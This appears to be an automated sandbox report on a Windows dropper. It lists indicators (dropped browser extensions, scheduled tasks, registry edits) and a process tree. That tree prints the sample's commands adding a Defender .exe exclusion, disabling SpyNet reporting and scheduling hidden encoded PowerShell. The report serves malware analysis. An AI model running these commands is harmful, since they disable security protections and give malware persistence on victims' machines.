Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
27-10-2022 11:35
Static task
static1
Behavioral task
behavioral1
Sample
984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe
Resource
win7-20220901-en
General
-
Target
984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe
-
Size
7.3MB
-
MD5
ec35db0e02bd0e18a017a52441ec54cc
-
SHA1
d4d01571c105471d3709eeb3f189fef85bbaf34c
-
SHA256
984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc
-
SHA512
44eb1553ac9f874b7f04bf9d4d71f9bb3c2dd0927e357ead4b420d4dc26b01224ba8260d324d4362048192db449184527c6f783542cbdf118eba3b5866f4fa42
-
SSDEEP
196608:91OYDOuTSfePzjgvuriRwpgaV6fyAYTpSHCPiTEqbDu62WWjYh:3ODuTEOjgvuO2B6qyyWEqoWB
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 57 4172 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 3460 Install.exe 3404 Install.exe 4568 lACwcQH.exe 2672 nbuvwCg.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation nbuvwCg.exe -
Loads dropped DLL 1 IoCs
pid Process 4172 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json nbuvwCg.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json nbuvwCg.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini nbuvwCg.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 nbuvwCg.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol lACwcQH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 nbuvwCg.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini lACwcQH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 nbuvwCg.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 nbuvwCg.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA nbuvwCg.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 nbuvwCg.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 nbuvwCg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies nbuvwCg.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\CmszfUlKU\mfwRsc.dll nbuvwCg.exe File created C:\Program Files (x86)\KAzPppVjngGU2\qCMzpUN.xml nbuvwCg.exe File created C:\Program Files (x86)\tEUgboViOVXhC\MNNGoqy.xml nbuvwCg.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi nbuvwCg.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak nbuvwCg.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja nbuvwCg.exe File created C:\Program Files (x86)\NBAnxdAYyVuYrJIDKcR\WvHLMEM.xml nbuvwCg.exe File created C:\Program Files (x86)\CmszfUlKU\UzcvFth.xml nbuvwCg.exe File created C:\Program Files (x86)\KAzPppVjngGU2\cmqfiwTRisIcA.dll nbuvwCg.exe File created C:\Program Files (x86)\NBAnxdAYyVuYrJIDKcR\FuKVeUw.dll nbuvwCg.exe File created C:\Program Files (x86)\LwwnfqzUtnUn\TfVIhIM.dll nbuvwCg.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi nbuvwCg.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak nbuvwCg.exe File created C:\Program Files (x86)\tEUgboViOVXhC\gOUIgvM.dll nbuvwCg.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\DzcOFfJcFiDtUecWi.job schtasks.exe File created C:\Windows\Tasks\bvaTKsBBalfzetbIqS.job schtasks.exe File created C:\Windows\Tasks\pWRoRRufbcBSXnZTh.job schtasks.exe File created C:\Windows\Tasks\KkeCdiUIdtvoEjB.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 540 schtasks.exe 1544 schtasks.exe 1800 schtasks.exe 4448 schtasks.exe 4856 schtasks.exe 4024 schtasks.exe 3644 schtasks.exe 3092 schtasks.exe 220 schtasks.exe 4928 schtasks.exe 4324 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000} nbuvwCg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing nbuvwCg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\NukeOnDelete = "0" nbuvwCg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3" nbuvwCg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume nbuvwCg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer nbuvwCg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" nbuvwCg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" nbuvwCg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket nbuvwCg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" nbuvwCg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" nbuvwCg.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 4312 powershell.EXE 4312 powershell.EXE 4060 powershell.exe 4060 powershell.exe 5060 powershell.exe 5060 powershell.exe 2812 powershell.EXE 2812 powershell.EXE 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe 2672 nbuvwCg.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4312 powershell.EXE Token: SeDebugPrivilege 4060 powershell.exe Token: SeDebugPrivilege 5060 powershell.exe Token: SeDebugPrivilege 2812 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4408 wrote to memory of 3460 4408 984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe 81 PID 4408 wrote to memory of 3460 4408 984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe 81 PID 4408 wrote to memory of 3460 4408 984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe 81 PID 3460 wrote to memory of 3404 3460 Install.exe 82 PID 3460 wrote to memory of 3404 3460 Install.exe 82 PID 3460 wrote to memory of 3404 3460 Install.exe 82 PID 3404 wrote to memory of 3348 3404 Install.exe 87 PID 3404 wrote to memory of 3348 3404 Install.exe 87 PID 3404 wrote to memory of 3348 3404 Install.exe 87 PID 3404 wrote to memory of 1532 3404 Install.exe 89 PID 3404 wrote to memory of 1532 3404 Install.exe 89 PID 3404 wrote to memory of 1532 3404 Install.exe 89 PID 3348 wrote to memory of 5092 3348 forfiles.exe 91 PID 3348 wrote to memory of 5092 3348 forfiles.exe 91 PID 3348 wrote to memory of 5092 3348 forfiles.exe 91 PID 1532 wrote to memory of 2744 1532 forfiles.exe 92 PID 1532 wrote to memory of 2744 1532 forfiles.exe 92 PID 1532 wrote to memory of 2744 1532 forfiles.exe 92 PID 5092 wrote to memory of 60 5092 cmd.exe 93 PID 5092 wrote to memory of 60 5092 cmd.exe 93 PID 5092 wrote to memory of 60 5092 cmd.exe 93 PID 2744 wrote to memory of 2816 2744 cmd.exe 94 PID 2744 wrote to memory of 2816 2744 cmd.exe 94 PID 2744 wrote to memory of 2816 2744 cmd.exe 94 PID 2744 wrote to memory of 2508 2744 cmd.exe 96 PID 2744 wrote to memory of 2508 2744 cmd.exe 96 PID 2744 wrote to memory of 2508 2744 cmd.exe 96 PID 5092 wrote to memory of 4208 5092 cmd.exe 95 PID 5092 wrote to memory of 4208 5092 cmd.exe 95 PID 5092 wrote to memory of 4208 5092 cmd.exe 95 PID 3404 wrote to memory of 4324 3404 Install.exe 98 PID 3404 wrote to memory of 4324 3404 Install.exe 98 PID 3404 wrote to memory of 4324 3404 Install.exe 98 PID 3404 wrote to memory of 3112 3404 Install.exe 100 PID 3404 wrote to memory of 3112 3404 Install.exe 100 PID 3404 wrote to memory of 3112 3404 Install.exe 100 PID 4312 wrote to memory of 4552 4312 powershell.EXE 106 PID 4312 wrote to memory of 4552 4312 powershell.EXE 106 PID 3404 wrote to memory of 4120 3404 Install.exe 112 PID 3404 wrote to memory of 4120 3404 Install.exe 112 PID 3404 wrote to memory of 4120 3404 Install.exe 112 PID 3404 wrote to memory of 4024 3404 Install.exe 114 PID 3404 wrote to memory of 4024 3404 Install.exe 114 PID 3404 wrote to memory of 4024 3404 Install.exe 114 PID 4568 wrote to memory of 4060 4568 lACwcQH.exe 117 PID 4568 wrote to memory of 4060 4568 lACwcQH.exe 117 PID 4568 wrote to memory of 4060 4568 lACwcQH.exe 117 PID 4060 wrote to memory of 1428 4060 powershell.exe 119 PID 4060 wrote to memory of 1428 4060 powershell.exe 119 PID 4060 wrote to memory of 1428 4060 powershell.exe 119 PID 1428 wrote to memory of 4768 1428 cmd.exe 120 PID 1428 wrote to memory of 4768 1428 cmd.exe 120 PID 1428 wrote to memory of 4768 1428 cmd.exe 120 PID 4060 wrote to memory of 4780 4060 powershell.exe 121 PID 4060 wrote to memory of 4780 4060 powershell.exe 121 PID 4060 wrote to memory of 4780 4060 powershell.exe 121 PID 4060 wrote to memory of 2008 4060 powershell.exe 122 PID 4060 wrote to memory of 2008 4060 powershell.exe 122 PID 4060 wrote to memory of 2008 4060 powershell.exe 122 PID 4060 wrote to memory of 4436 4060 powershell.exe 123 PID 4060 wrote to memory of 4436 4060 powershell.exe 123 PID 4060 wrote to memory of 4436 4060 powershell.exe 123 PID 4060 wrote to memory of 4088 4060 powershell.exe 124 PID 4060 wrote to memory of 4088 4060 powershell.exe 124
Processes
-
C:\Users\Admin\AppData\Local\Temp\984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe"C:\Users\Admin\AppData\Local\Temp\984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Users\Admin\AppData\Local\Temp\7zSCEFD.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Users\Admin\AppData\Local\Temp\7zSD2F5.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3404 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3348 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:5092 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:60
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4208
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2744 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2816
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2508
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOxzCdWvL" /SC once /ST 05:45:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOxzCdWvL"4⤵PID:3112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOxzCdWvL"4⤵PID:4120
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvaTKsBBalfzetbIqS" /SC once /ST 13:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nSsQRaKrrRPLzDjLR\XVNxJANhOcIWPTn\lACwcQH.exe\" zx /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4024
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4552
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4916
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2124
-
